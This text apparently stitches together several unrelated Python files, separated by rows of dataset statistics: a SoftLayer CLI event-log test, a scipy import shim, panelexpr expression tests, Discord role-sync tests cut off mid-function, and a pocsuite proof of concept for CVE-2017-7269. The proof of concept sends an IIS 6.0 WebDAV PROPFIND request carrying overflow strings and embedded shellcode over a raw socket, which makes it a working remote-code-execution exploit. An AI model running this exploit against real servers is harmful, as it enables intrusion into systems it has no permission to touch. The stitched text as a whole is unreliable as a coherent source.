        ('2017-10-18T09:40:41.830338-05:00',
         'Security Group Rule Added',
         'test.softlayer.com',
         'SL12345-test',
         'CCI',
         '{"networkComponentId":"100",'
         '"networkInterfaceType":"public",'
         '"requestId":"53d0b91d392864e062f4958",'
         '"rules":[{"direction":"ingress",'
         '"ethertype":"IPv4",'
         '"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
         '"remoteGroupId":null,"remoteIp":null,"ruleId":"100"}],"securityGroupId":"200",'
         '"securityGroupName":"test_SG"}'),
        ('2017-10-18T09:40:32.238869-05:00',
         'Security Group Added',
         'test.softlayer.com',
         'SL12345-test',
         'CCI',
         '{"networkComponentId":"100",'
         '"networkInterfaceType":"public",'
         '"requestId":"96c9b47b9e102d2e1d81fba",'
         '"securityGroupId":"200",'
         '"securityGroupName":"test_SG"}'),
        ('2017-10-18T10:42:13.089536-05:00',
         'Security Group Rule(s) Removed',
         'test_SG',
         'SL12345-test',
         'Security Group',
         '{"requestId":"2abda7ca97e5a1444cae0b9",'
         '"rules":[{"direction":"ingress",'
         '"ethertype":"IPv4",'
         '"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
         '"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'),
        ('2017-10-18T10:42:11.679736-05:00',
         'Network Component Removed from Security Group',
         'test_SG',
         'SL12345-test',
         'Security Group',
         '{"fullyQualifiedDomainName":"test.softlayer.com",'
         '"networkComponentId":"100",'
         '"networkInterfaceType":"public",'
         '"requestId":"6b9a87a9ab8ac9a22e87a00"}'),
        ('2017-10-18T10:41:49.802498-05:00',
         'Security Group Rule(s) Added',
         'test_SG',
         'SL12345-test',
         'Security Group',
         '{"requestId":"0a293c1c3e59e4471da6495",'
         '"rules":[{"direction":"ingress",'
         '"ethertype":"IPv4",'
         '"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
         '"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'),
        ('2017-10-18T10:41:42.176328-05:00',
         'Network Component Added to Security Group',
         'test_SG',
         'SL12345-test',
         'Security Group',
         '{"fullyQualifiedDomainName":"test.softlayer.com",'
         '"networkComponentId":"100",'
         '"networkInterfaceType":"public",'
         '"requestId":"4709e02ad42c83f80345904"}'),
    )

    @staticmethod
    def _format_metadata(raw):
        """Pretty-print *raw* JSON the same way the CLI renders metadata.

        ``None`` (event without metadata) renders as an empty string.
        """
        if raw is None:
            return ''
        return json.dumps(json.loads(raw), indent=4, sort_keys=True)

    @classmethod
    def _expected_logs(cls, with_metadata):
        """Build the expected event dicts, optionally with a 'metadata' key."""
        expected = []
        for date, event, obj, username, log_type, raw in cls._RAW_LOGS:
            entry = {
                'date': date,
                'event': event,
                'object': obj,
                'username': username,
                'type': log_type,
            }
            if with_metadata:
                entry['metadata'] = cls._format_metadata(raw)
            expected.append(entry)
        return expected

    def test_get_event_log_with_metadata(self):
        """`event-log get --metadata` returns events with formatted metadata."""
        result = self.run_command(['event-log', 'get', '--metadata'])

        self.assert_no_fail(result)
        self.assertEqual(self._expected_logs(with_metadata=True),
                         json.loads(result.output))

    def test_get_event_log_without_metadata(self):
        """`event-log get` returns the same events without the metadata key."""
        result = self.run_command(['event-log', 'get'])

        self.assert_no_fail(result)
        self.assertEqual(self._expected_logs(with_metadata=False),
                         json.loads(result.output))

    def test_get_event_table(self):
        """Table output matches a manually assembled formatting.Table."""
        table_fix = formatting.Table(['event', 'object', 'type', 'date', 'username', 'metadata'])
        table_fix.align['metadata'] = "l"
        for log in self._expected_logs(with_metadata=True):
            # The CLI strips the outer braces and surrounding whitespace
            # from the pretty-printed metadata before tabulating it.
            table_fix.add_row([log['event'], log['object'], log['type'], log['date'],
                               log['username'], log['metadata'].strip("{}\n\t")])
        expected_output = formatting.format_output(table_fix) + '\n'

        result = self.run_command(args=['event-log', 'get', '--metadata'], fmt='table')

        self.assert_no_fail(result)
        self.assertEqual(expected_output, result.output)

    def test_get_event_log_empty(self):
        """An empty API response prints the "None available." sentinel."""
        mock = self.set_mock('SoftLayer_Event_Log', 'getAllObjects')
        mock.return_value = None

        result = self.run_command(['event-log', 'get'])

        self.assertEqual(mock.call_count, 1)
        self.assert_no_fail(result)
        self.assertEqual('"None available."\n', result.output)

    def test_get_event_log_types(self):
        """`event-log types` lists every known event-log type."""
        type_names = [
            "Account", "CDN", "User", "Bare Metal Instance",
            "API Authentication", "Server", "CCI", "Image",
            "Bluemix LB", "Facility", "Cloud Object Storage",
            "Security Group",
        ]
        expected = [{"types": {"value": name}} for name in type_names]

        result = self.run_command(['event-log', 'types'])

        self.assert_no_fail(result)
        self.assertEqual(expected, json.loads(result.output))
| 38.863271
| 104
| 0.416736
| 1,080
| 14,496
| 5.52037
| 0.14537
| 0.067595
| 0.035223
| 0.06944
| 0.85743
| 0.854411
| 0.849715
| 0.827742
| 0.809124
| 0.809124
| 0
| 0.108677
| 0.433154
| 14,496
| 372
| 105
| 38.967742
| 0.616892
| 0.008623
| 0
| 0.663793
| 0
| 0
| 0.377047
| 0.200544
| 0
| 0
| 0
| 0
| 0.031609
| 1
| 0.014368
| false
| 0
| 0.008621
| 0
| 0.025862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c53385513c4e7f055cd5a040c28216148fd90682
| 235
|
py
|
Python
|
scipy/integrate/_quadpack_clr.py
|
jasonmccampbell/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | 8
|
2015-10-07T00:37:32.000Z
|
2022-01-21T17:02:33.000Z
|
scipy/integrate/_quadpack_clr.py
|
enthought/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/integrate/_quadpack_clr.py
|
enthought/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | 8
|
2015-05-09T14:23:57.000Z
|
2018-11-15T05:56:00.000Z
|
import sys

# On IronPython (sys.platform == 'cli') the native extension lives in a CLR
# assembly that must be loaded explicitly before the module can be imported.
if sys.platform == 'cli':
    import clr
    clr.AddReference('integrate')

# Re-export the QUADPACK entry points; the private names are imported
# explicitly because the star-import below would skip underscore-prefixed ones.
from scipy__integrate___quadpack import _qagie, _qagpe, _qawoe, _qawfe, _qawce, _qagse, _qawse
from scipy__integrate___quadpack import *
| 21.363636
| 98
| 0.740426
| 28
| 235
| 5.607143
| 0.642857
| 0.11465
| 0.229299
| 0.33121
| 0.407643
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182979
| 235
| 10
| 99
| 23.5
| 0.817708
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c54a06ac7bb9e56ee7f9831a6d2867dabbdf8584
| 5,963
|
py
|
Python
|
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
import unittest
from panelexpr._utils.utils import *
from panelexpr import eval as t_eval
THRESHOLD = 1e-6
class BasicTest(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        # Load the shared CSV fixture once for the whole class; tests only
        # read from it. Path is relative — assumes pytest runs from test/.
        cls.data = pd.read_csv("../data/sample_zh_2.csv")
def test_add(self):
s1 = t_eval("Open + Close", data=self.data)
s2 = self.data["Open"] + self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_sub(self):
s1 = t_eval("Open - Close", data=self.data)
s2 = self.data["Open"] - self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_mul(self):
s1 = t_eval("Open * Close", data=self.data)
s2 = self.data["Open"] * self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
#
def test_div(self):
s1 = t_eval("Open / Close", data=self.data)
s2 = self.data["Open"] / self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_complex(self):
s1 = t_eval("Open / (Close - High)", data=self.data)
s2 = self.data["Open"] / (self.data["Close"] - self.data["High"])
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean(self):
s1 = t_eval("mmean(Open, 2, group_by='windcode')", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean_global_params(self):
s1 = t_eval("ma(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_max(self):
s1 = t_eval("mmax(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).max()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_min(self):
s1 = t_eval("mmin(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).min()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean_overflow(self):
s1 = t_eval("mmean(Open, 10)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(10).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD or matching)
def test_rolling_std(self):
s1 = t_eval("mstd(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).std()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_cov(self):
s1 = t_eval("mcov(Open, Close, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).cov(df["Close"].rolling(2))).reset_index()
s2 = df[0]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_corr(self):
s1 = t_eval("mcorr(Open, Close, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).corr(df["Close"].rolling(2))).reset_index()
s2 = df[0]
v = mean_absolute_deviation(s1, s2)
self.assertTrue(v < THRESHOLD)
def test_ewma(self):
s1 = t_eval("ewm(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda d: d["Open"].ewm(span=2, min_periods=1).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rank(self):
def fun(df):
df["or"] = df["Open"].rank()
return df
data = self.data.sort_values(["Date", "windcode"])
data["s1"] = s1 = t_eval("rank(Open)", time_tag="Date", data=data)
data["s2"] = s2 = data.groupby("Date").apply(fun)["or"]
# print(data[["Date", "windcode", "Open", "s1", "s2"]])
# print(data)
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
class NanTest(BasicTest):
    """Re-runs every BasicTest case against a fixture containing missing
    values, exercising the NaN-propagation half of each assertion."""

    @classmethod
    def setUpClass(cls):
        # Same fixture mechanism as BasicTest, different (NaN-bearing) CSV.
        cls.data = pd.read_csv("../data/sample_zh_3.csv")


if __name__ == '__main__':
    unittest.main()
| 37.980892
| 125
| 0.608754
| 799
| 5,963
| 4.390488
| 0.115144
| 0.079818
| 0.029932
| 0.094071
| 0.823831
| 0.823831
| 0.799886
| 0.799886
| 0.799886
| 0.799886
| 0
| 0.026553
| 0.235787
| 5,963
| 156
| 126
| 38.224359
| 0.743252
| 0.010901
| 0
| 0.550388
| 0
| 0
| 0.097913
| 0.007806
| 0
| 0
| 0
| 0
| 0.217054
| 1
| 0.139535
| false
| 0
| 0.023256
| 0
| 0.186047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c56142abe52fdfe53189d64b9b52592a2cbe1b07
| 7,809
|
py
|
Python
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
#requests
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip
#基础基类
#CVE-2017-7269 IIS webdav RCE
class iis_RCE_POC(POCBase):
vulID = '45' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2018-08-16' #漏洞公开的时间,不知道就写今天
author = 'arr0w1' # PoC作者的大名
createDate ='2018-08-16'# 编写 PoC 的日期
updateDate = '2018-08-16'# PoC 更新的时间,默认和编写时间一样
references = ['https://nvd.nist.gov/vuln/detail/CVE-2017-7269']# 漏洞地址来源,0day不用写
name = 'CVE-2017-7269'# PoC 名称
appPowerLink = 'https://www.iis.net/'# 漏洞厂商主页地址
appName = 'IIS'# 漏洞应用名称
appVersion = '6.0'# 漏洞影响版本
vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
IIS 6.0 webdav RCE,CVE-2017-7269
''' # 漏洞简要描述
samples = []# 测试样列,就是用 PoC 测试成功的网站
install_requires = ['socket',['re']]# PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
#指纹方法
def _fingerprint(self):
pass
def _verify(self):
# ip = self.url.split(':')[1].replace('/', '')
#from api.utils import url2ip
#--------------找url中 冒号后的web端口
import re
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_port = url2ip(self.url)[1]
else:
_port = 80
#-------------
ip = url2ip(self.url)
import socket
result={}
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'
pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5
\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
pay += shellcode
pay += '>\r\n\r\n'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, _port))# ip port
sock.send(pay)
try:
data = sock.recv(80960)
except:
print '连接失败'
pass
print '-'*18+'\n'
print data
print '-'*18+'\n'
sock.close()
if not -1 == data.find('HHIT CVE-2017-7269 Success'):
message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!'
print(message)
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = pay
return True
else:
print '没有发现关键字.'
return False
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(iis_RCE_POC)
| 60.069231
| 2,193
| 0.698425
| 1,358
| 7,809
| 4.000736
| 0.198085
| 0.024296
| 0.018222
| 0.013252
| 0.045831
| 0.034235
| 0.01767
| 0.009939
| 0.009939
| 0
| 0
| 0.207468
| 0.118581
| 7,809
| 130
| 2,194
| 60.069231
| 0.581868
| 0.065437
| 0
| 0.098765
| 0
| 0.037037
| 0.709203
| 0.646589
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.037037
| 0.123457
| null | null | 0.08642
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c561ba447700d0a67f82634f86fe0d6edd3149c0
| 3,845
|
py
|
Python
|
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | 1
|
2021-02-16T10:01:34.000Z
|
2021-02-16T10:01:34.000Z
|
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | null | null | null |
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | null | null | null |
from bot.cogs.sync.syncers import Role, get_roles_for_sync
def test_get_roles_for_sync_empty_return_for_equal_roles():
    """When the API and guild agree on every role, nothing needs syncing."""
    stored = {Role(id=41, name='name', colour=33, permissions=0x8, position=1)}
    current = {Role(id=41, name='name', colour=33, permissions=0x8, position=1)}
    diff = get_roles_for_sync(current, stored)
    assert diff == (set(), set(), set())
def test_get_roles_for_sync_returns_roles_to_update_with_non_id_diff():
    """A role whose id matches but whose other fields differ is an update."""
    stored = {Role(id=41, name='old name', colour=35, permissions=0x8, position=1)}
    current = {Role(id=41, name='new name', colour=33, permissions=0x8, position=2)}
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == set()
    # The guild-side version is what should be pushed as the update.
    assert updated == current
    assert deleted == set()
def test_get_roles_only_returns_roles_that_require_update():
    """Unchanged roles must not appear in the to-update set."""
    unchanged = Role(id=53, name='other role', colour=55, permissions=0, position=3)
    changed = Role(id=41, name='new name', colour=35, permissions=0x8, position=2)
    stored = {
        Role(id=41, name='old name', colour=33, permissions=0x8, position=1),
        Role(id=53, name='other role', colour=55, permissions=0, position=3)
    }
    current = {changed, unchanged}
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == set()
    assert updated == {changed}
    assert deleted == set()
def test_get_roles_returns_new_roles_in_first_tuple_element():
    """A role present in the guild but unknown to the API is a creation."""
    shared = Role(id=41, name='name', colour=35, permissions=0x8, position=1)
    fresh = Role(id=53, name='other role', colour=55, permissions=0, position=2)
    stored = {Role(id=41, name='name', colour=35, permissions=0x8, position=1)}
    current = {shared, fresh}
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == {fresh}
    assert updated == set()
    assert deleted == set()
def test_get_roles_returns_roles_to_update_and_new_roles():
    """Creations and updates are reported together, each in its own slot."""
    modified = Role(id=41, name='new name', colour=40, permissions=0x16, position=2)
    fresh = Role(id=53, name='other role', colour=55, permissions=0, position=3)
    stored = {
